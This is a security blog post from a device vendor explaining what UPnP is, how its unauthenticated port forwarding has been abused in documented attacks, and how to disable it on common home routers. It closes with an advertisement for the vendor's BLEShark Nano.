Cover image for DD15

What Is UPnP and Why Should You Disable It?

Table of Contents

What UPnP Does

Universal Plug and Play (UPnP) is a set of networking protocols that allows devices on a local network to discover each other and establish communication automatically. It handles device discovery (via SSDP), device description (via XML), service control (via SOAP), and event notification.

The most security-relevant feature of UPnP is its ability to modify router configuration automatically. A device on your LAN can ask your router to open ports, create port forwarding rules, and modify firewall settings - all without any user interaction or authentication.

UPnP was designed in the late 1990s by Microsoft and other companies in the UPnP Forum. The goal was zero-configuration networking: plug a device in, and it works. That goal was achieved. The security consequences were not considered.

Automatic Port Forwarding

The Internet Gateway Device (IGD) protocol is the UPnP profile that controls port forwarding on routers. When a device on your LAN sends an IGD request, it can create a port mapping that forwards traffic from a specific external port to an internal IP address and port.

graph TD
    subgraph "UPnP Port Forwarding Flow"
        APP[Application on LAN] -->|SSDP Discovery| ROUTER[Router with UPnP]
        APP -->|AddPortMapping SOAP request| ROUTER
        ROUTER -->|Opens external port 8080| WAN[Internet - WAN Interface]
        WAN -->|Traffic on port 8080| ROUTER
        ROUTER -->|Forwards to 192.168.1.50:8080| APP
    end
    subgraph "No Authentication Required"
        ANY[Any device on LAN] -->|Can request port mappings| ROUTER2[Router]
        ROUTER2 -->|Opens ports without user approval| OPEN[Firewall holes created]
    end

Any device on the LAN can open ports on the router - no password or user approval needed

The request does not require authentication. There is no password, no approval prompt, no notification to the user. The router simply does what it is told. This is by design - UPnP was built to work without user intervention.

Why UPnP Exists

Before UPnP, any application that needed to receive inbound connections from the internet required manual port forwarding. Users had to log into their router's admin panel, find the port forwarding section, create a rule with the correct internal IP, internal port, external port, and protocol. Most home users could not do this.

Gaming consoles need inbound connections for multiplayer lobbies. BitTorrent clients need inbound connections for peer-to-peer transfers. VoIP applications need open ports for incoming calls. Smart home devices need ports for remote access. Video conferencing tools sometimes need direct connections.

UPnP solved this by letting applications configure the router themselves. Plug in your Xbox, and it automatically opens the ports it needs. Install a torrent client, and it configures port forwarding on its own. The user experience improved dramatically.

The Security Problem

The convenience of automatic port forwarding is also its danger. Any software running on any device on your LAN can open any port on your router. This includes malware.

If a single device on your network is compromised - a laptop with a trojan, a smart camera with a vulnerability, an IoT device running outdated firmware - the malware can use UPnP to open ports on your router. It can expose internal services to the internet, create backdoor access for command-and-control servers, or open RDP (Remote Desktop Protocol) to allow remote attackers direct access to machines on your network.

The attack does not require compromising the router. The router is doing exactly what UPnP tells it to do. The compromise only needs to happen on any device inside the LAN.

graph TD
    subgraph "UPnP Malware Attack Chain"
        M1[Malware infects IoT device] --> M2[Malware discovers router via SSDP]
        M2 --> M3[Malware sends AddPortMapping]
        M3 --> M4[Router opens port 3389 to IoT device]
        M4 --> M5[Malware sets up RDP proxy]
        M5 --> M6[Attacker connects from internet]
        M6 --> M7[Full access to internal network]
    end

Malware on any LAN device can open router ports via UPnP - creating remote access for attackers

Documented Attacks

UPnP abuse is not theoretical. It has been documented repeatedly in real-world attacks.

Fiesta Exploit Kit (2014-2015): Malware delivered through the Fiesta exploit kit used UPnP to open RDP ports on victims' routers, giving attackers remote desktop access to internal machines. The malware did not need to exploit the router itself - it simply used UPnP as designed.

Pinkslipbot/QakBot (2017): This banking trojan used UPnP to turn infected machines into proxy servers. It opened ports on the router to allow other infected machines to relay command-and-control traffic through the victim's network. The router facilitated the botnet infrastructure without being compromised.

UPnProxy (2018): Akamai researchers discovered that attackers were injecting malicious NAT entries into routers via UPnP from the internet. Over 65,000 routers were found with injected port mappings, used to proxy traffic for spam campaigns and ad fraud. Some routers had UPnP accessible from the WAN interface, allowing remote exploitation.

CallStranger - CVE-2020-12695

CallStranger is a vulnerability in the UPnP SUBSCRIBE function that allows an attacker to abuse the callback URL in UPnP event subscriptions. The attacker sends a SUBSCRIBE request to a UPnP device, specifying an external URL as the callback. The device then sends HTTP requests to that external URL whenever events occur.

This can be used for three attacks: data exfiltration (the device sends data to an attacker-controlled server), DDoS amplification (the device floods a victim with HTTP callbacks), and port scanning (the device probes internal network addresses on behalf of the attacker).

CallStranger affected billions of devices because it was a flaw in the UPnP specification itself, not in a specific implementation. Every device that followed the UPnP spec was vulnerable.

How to Disable UPnP

Disabling UPnP is straightforward on most routers. Log into your router's admin panel (typically at 192.168.1.1 or 192.168.0.1), find the UPnP setting (usually under Advanced, NAT, or Firewall settings), and turn it off.

Common locations by router brand:

  • Netgear: Advanced > Advanced Setup > UPnP
  • TP-Link: Advanced > NAT Forwarding > UPnP
  • Asus: WAN > Connection > Enable UPnP
  • Linksys: Connectivity > UPnP

After disabling, check that existing port mappings created by UPnP are also cleared. Some routers retain previously created mappings even after UPnP is disabled.

What Breaks When You Disable It

Some applications and devices rely on UPnP for port forwarding. When you disable it, these applications cannot automatically open ports and may experience reduced functionality.

Gaming consoles may report "NAT type: strict" and have trouble connecting to multiplayer lobbies. You can fix this by manually forwarding the required ports or enabling DMZ for the console (though DMZ has its own security implications).

BitTorrent clients may not be reachable by other peers, reducing download speeds. Manual port forwarding fixes this.

VoIP applications may have trouble with incoming calls if they rely on UPnP for NAT traversal. Most modern VoIP services use STUN/TURN servers instead and do not need UPnP.

Smart home remote access may stop working if the device used UPnP to expose itself. Most smart home platforms now use cloud relay connections instead, which do not require UPnP.

The Verdict

Disable UPnP. The security risk of allowing any device on your network to open arbitrary firewall ports without authentication far outweighs the convenience of automatic port forwarding. Manually forward the specific ports you need for specific applications.

The few minutes spent configuring manual port forwarding are worth the protection against malware that could otherwise punch holes through your firewall at will.

Securing your network starts with understanding what protocols and services are running on it. The BLEShark Nano helps you discover wireless devices on your network, giving you the visibility needed to audit your environment and identify devices that might be using UPnP to modify your router's configuration.

Get the BLEShark Nano - $36.99+
Back to blog

Leave a comment